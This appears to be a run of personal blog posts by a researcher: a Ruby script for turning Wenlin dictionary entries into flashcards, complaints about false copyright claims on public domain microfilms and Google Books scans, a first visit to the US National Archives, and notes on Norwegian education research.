Wenlin doesn’t make it easy for you, however, to get the word entries into a format that can be easily imported into flashcard applications. There is no “export” feature, presumably because the developer doesn’t like the idea of large parts of the Wenlin dictionary getting out of the software and into a separate database. However, the lack of such a feature means that students have to copy and paste words from Wenlin and add their own tabs. In my case, I also like to delete the alternate hanzi to keep my flashcards cleaner.

Although a more experienced programmer with good regular expression skills could easily take this further, I am releasing the results of an evening spent trying to learn how to program in Ruby:

Wenlin Conversion Script 1.3

Here is a screencast explaining how to use the script:

Wenlin Conversion Script Screencast

This script takes a text file with a list of Wenlin dictionary entries (saved in TextEdit, not in Wenlin) and puts tabs between the hanzi and the pinyin and between the pinyin and the definition. It then saves the converted file, which can be easily imported into your favorite flashcard program.

It is made up of two scripts: the convert.app AppleScript application, which is what you use to run the script, and the convert.rb Ruby script, which does the actual conversion. You can customize three options in the convert.rb script. Just open it up and set the three option variables at the top to true or false according to your preference for that option. There is a description of what each option does in the Ruby file, but basically they control whether the alternate traditional/simplified hanzi are removed, whether the “|” character is changed to “Example: ”, and whether the “~” in examples is replaced by the pinyin of the word.
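As a rough illustration of what those three options do, here is a minimal Ruby sketch. It is not the actual convert.rb: the entry format (hanzi, optional alternate hanzi in square brackets, a single pinyin word, then the definition), the constant names, and the convert_entry method are all assumptions made for the example.

```ruby
# Hypothetical option flags, mirroring the three options described above.
REMOVE_ALTERNATE_HANZI = true
EXPAND_EXAMPLE_MARKER  = true
REPLACE_TILDE          = true

# Assumed entry shape (an assumption, not taken from Wenlin's documentation):
#   hanzi[alternate hanzi] pinyin definition
ENTRY = /\A(?<hanzi>[^\s\[]+)(?<alt>\[[^\]]*\])?\s+(?<pinyin>\S+)\s+(?<definition>.*)\z/

# Turn one dictionary line into "hanzi<TAB>pinyin<TAB>definition".
def convert_entry(line)
  m = ENTRY.match(line.strip)
  return line if m.nil? # leave lines we do not recognise untouched

  hanzi = m[:hanzi]
  hanzi += m[:alt] if m[:alt] && !REMOVE_ALTERNATE_HANZI

  definition = m[:definition]
  # Swap the "|" marker (and any spaces after it) for a readable label.
  definition = definition.gsub(/\|\s*/, "Example: ") if EXPAND_EXAMPLE_MARKER
  # Replace the "~" placeholder with the pinyin of the headword.
  definition = definition.gsub("~", m[:pinyin]) if REPLACE_TILDE

  [hanzi, m[:pinyin], definition].join("\t")
end
```

Calling convert_entry on each line of the saved text file and writing the results out would give a tab-separated file of the kind most flashcard programs can import. Note that this sketch assumes the pinyin contains no spaces, which is not always true of Wenlin entries.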

I haven’t tested this too extensively, so if you see it do strange things with the Wenlin vocab items let me know and I’ll tweak the script in the future.


-I just noticed in the screencast that it split the word “fandong fenzi” and put “fenzi” into the definition – I need to update the regular expression so that it looks for the part of speech rather than a space to separate the pinyin from the definition. I didn’t realize that Wenlin sometimes puts spaces into its pinyin words. I’ll release this soon.

-I just updated a 1.1 version. See the enclosed Read Me file for things I have fixed and changed in this new version of the script.

-I just updated the script again to 1.3, see the readme in the download for the details.
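The idea in the first note above, separating the pinyin from the definition at the part of speech rather than at the first space, might be sketched like this. This is only an illustration under stated assumptions, not the code in the released script: it uses a simple word-list lookup instead of a regular expression, and the POS list and the split_pinyin_and_definition method are hypothetical names with an incomplete, made-up set of abbreviations.

```ruby
# Hypothetical, incomplete list of part-of-speech abbreviations; extend it to
# match whatever abbreviations actually appear in your entries.
POS = %w[n. v. adj. adv.].freeze

# Split "pinyin words pos. definition" at the first part-of-speech marker,
# so that multi-word pinyin stays together.
def split_pinyin_and_definition(text)
  words = text.split(" ")
  index = words.index { |word| POS.include?(word) }
  return [text, ""] if index.nil? # no marker found: treat it all as pinyin

  [words[0...index].join(" "), words[index..-1].join(" ")]
end
```

With this approach a two-word pinyin such as “fandong fenzi” stays in the pinyin field as long as a known part-of-speech marker follows it.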

Copyright Claims on US Government Documents

In the past I have repeatedly complained about claims of copyright protection where no such protection exists.

I have talked about this problem on Google Books, where books are not given full view even though they are fully in the public domain, or where the copies used are public domain books republished by Kessinger Publishing, which wrongly claims copyright protection. A recent critique of Google Books by a blogger at the AHA has mentioned a similar problem in a posting here.

I have also expressed my frustration with the new Footnote.com service which gives access to completely public domain documents through a paid service and then forbids the viewers to copy and freely use this completely unprotected and public domain content through their restrictive licensing agreement. This is part of the trend towards using licenses to restrict the usage of materials which cannot otherwise be defended by copyright.

Isn’t it enough that we have to face unjustifiably long-lasting copyright protection laws, and various other blocks to the increasing potential for cultural innovation and information sharing provided by the internet?

Well, this problem isn’t limited to the online world. I have been looking at a lot of microfilms lately of US government documents, mostly from the US State Department. These are documents I can usually see the originals of by visiting the National Archives. Almost all of these documents, that is, any documents produced by the US Government, are completely in the public domain and no publisher or individual can “legally assert copyright unless the publisher or individual has added original, copyright protected material.”

So explain to me why it is that University Publications of America, which created the microfilms of these US government archival records, can get away with proclaiming their copyright on the microfilm reel:


Even if they could claim copyright on messages they put at the beginning of the microfilm, which is hardly what I think the law has in mind when it says “original material,” their copyright does not extend to the materials held within. I don’t think that reproducing these public domain documents in this photographic form is in any way original. Furthermore, when there are copyrighted materials (there are scanned published books in the possession of the State Department, for example), UPA can hardly claim copyright over such materials, even if I’m grateful that they include such scans in the microfilm, possibly in violation of the copyrights on those materials.

Look at this warning they put in:


Even if we let them have their copyright on this page of the reel, I don’t understand how UPA has any right to graciously “grant” me permission to make enlarged photocopies of only selected items, or deny me the right to make a reel duplication of almost the entire reel, except their introductory frames. Where do they get this right over the material? If these are public domain materials, I should be able to duplicate and use these materials in any way I see fit, whether it is selected photocopies, or print outs, or by copying every single unprotected page within the reel. I should have this right whether I’m engaged in research, or even if I wished to publish a book (without asserting copyright) with the entire public domain contents shown.

These kinds of false claims help contribute to the “permission culture” that we find ourselves in, where we become increasingly paranoid about exchanging ideas and creating new culture that uses the rich variety of materials that we have access to.

First Visit to the National Archives

I just spent two days at the US National Archives at College Park, MD. It is a truly wonderful place to work as a researcher. Sunlight streams through the windows in the wide open reading room on the second floor where researchers sit at well spaced workstations with their happily plugged in laptops and work a box at a time from a trolley full of boxes delivered to them during the several archive “pull times” throughout the day. One corner of the second floor is filled with copy machines and a long “research assistance” room behind the workspace area is staffed by often elderly looking archivists who command the range of obscure knowledge required to guide you in requesting the materials most likely to be useful for your research.

To get to the National Archives complex (Archives II) I simply hopped on the Green Line of the Metro and took it to Greenbelt, where I took the R3 bus that goes into the archive campus and will drop you off near the entrance (you can probably get off at one of the earlier Metro stops and take the bus from there as R3 passes several Green Line stops).

There are a few rules and procedures a researcher has to go through to get to their materials, but on the whole I found the process very smooth and everyone respectful and helpful along the way. When you enter the building you have to put your luggage through an X-ray machine and go through a regular airport-style screening. If it is your first visit, you then turn right and enter the orientation room, where they make you view a computer slide presentation summarizing the important rules and fill out an on-screen form to register yourself as a researcher. After this you are issued a photo ID “researcher card” on the spot, which is valid for one year. There are lockers in the basement to store most of your possessions. All I brought in with me was my laptop, power cable, headphones, and a few stapled sheets of paper with some notes listing what archival documents I wanted to look at. No bags or pens are allowed inside (they provide pencils, note cards, and paper once you get in), papers brought in have to be approved and stamped, and laptops, scanners, and other equipment need to be registered. When you exit the protected area you have to check the serial number of your equipment against the registration receipt and open laptops to show that no documents are hidden within. Any photocopies you make while on the inside have “Secret” or “Confidential” etc. blacked out if this is written on them, and are stamped “Declassified” and identified as copies.

Whenever you enter and leave the protected area they swipe your card. Whenever you enter a room to work in, they swipe your card, and check your materials when you leave. I never felt this process to be that annoying however, and the archivists were incredibly friendly everywhere I went. I left my belongings and microfilms at my workstation whenever I went downstairs and outside the protected area to visit their nice cafe or the convenience store for a snack.

I was impressed by the huge variety of people doing research here.

Norwegian Schools and Views on Education

I’m waiting for my flight to Stavanger here in the beautiful and extremely expensive Oslo airport (Bottle of water: $3.17, Strawberry Yoghurt $2.70, Small Cheese and Ham Roll $7.77, etc.) and reading today’s Dagbladet (I think it is usually considered a somewhat leftist Labor party supporting and populist paper). In a series of articles entitled “Norwegian Schools in Crisis” there was one piece listing the results so far from a series of studies on Norwegian education and comparisons with several other European countries and the US. Below are a few of the conclusions so far according to two professors Anne Welle-Strand and Arild Tjeldvoll:

Too many bad teachers: Apparently there are a lot of under-qualified and insufficiently trained teachers in Norway, including some recruited straight out of secondary school (C: can this be true? Am I not understanding this correctly: “I flere år er det blitt rekruttert svake kandidater fra videregående skole.” [“For several years, weak candidates have been recruited from upper secondary school.”])

Not enough specialization: While teachers in other countries focus on one topic or one grade level, Norwegian teachers often follow their class from one year to the next. This has resulted in many Norwegian primary school teachers lacking specialized knowledge. C: I remember this from when I spent a brief time in Norwegian elementary school (Sunde Skole). I have often wondered what the pros and cons of this system must be.

Strong opposition to evaluations and student testing: The researchers see this as the biggest problem with trying to raise quality. C: I agree to a point that this can be a problem, but I would want to guard against the opposite problem, which arises in places that go way too far in trying to quantify progress and knowledge with elaborate testing and evaluation schemes.

An “Anti-Knowledge View” («anti-kunnskaps-syn»): These researchers claim that over-emphasis on the socialization aspects of education has gotten in the way of knowledge and hurt Norwegians’ ability to compete internationally.

-The results of a study of OECD countries last year showed that only 47% of Norwegians surveyed believed that “education was important,” which was 20% below the average responses in other countries.

Google Books and the Public Domain

I’m looking for an obscure 1917 book by the philosopher and Unitarian minister W. Tudor Jones called the Spiritual Ascent of Man. W. Tudor Jones is mentioned by a Japanese philosopher and pragmatist Sugimori Kôjirô in a separate 1917 book I’m looking at here today in the rare book collection at Harvard. I’m doing some research on Sugimori and I suspect he was influenced by Jones. I wanted to read the Jones book and was delighted to discover that Google Books has it! How wonderful, I thought, this will save me a trip to the Divinity School library, where they have a hard copy.

Yet again Google Books has shown me how powerful it has become as a tool for researchers. However, when I go to the Google Books copy and view the book, in the right hand margin it says, “Copyrighted Material” and restricts my viewing to a limited number of pages.

When I go to the copyright information at the beginning of the book, it says, “Copyright, 1917 by W. Tudor Jones” and at the bottom of the page it says the publisher is “The Knickerbocker Press, New York”

Here we have a book, copyrighted in 1917, that has been published in the United States. According to this handy chart over at the Cornell Copyright Information Center, all books published in the United States before 1923 are, without condition, in the public domain. Why then does Google deny the visitor access to the remainder of the book?

The most likely answer is that Google has some connection to the book via Kessinger Publishing, which sells reprints of rare books. Have they copyrighted their scan of the book? If you look at the Google introductory page for the book, it lists Kessinger as publishing and copyrighting the book in 2003.

Projects like Google Books and, even more, Project Gutenberg are wonderful resources for research. At Gutenberg’s archive, for example, I was able to download a full copy of a book by Jones examining the work of a German philosopher, Rudolf Eucken. However, in the case of Google Books, I’m annoyed to see that so many books that should be fully in the public domain are showing up as copyrighted. At the Google blog entry on public domain books in Google Books they excitedly announce that you can find books out of copyright by searching with a query such as “steam engine date:1500-1923.” That is fine, and it turns up tens of thousands of books from this period. However, the book I searched for was also published before 1923 but, like many other books from this period that I have found on Google Books, it is “copyrighted material.” Presumably, Google will now be content to have a 2003 “copyrighted” scan of a public domain 1917 work in its collection.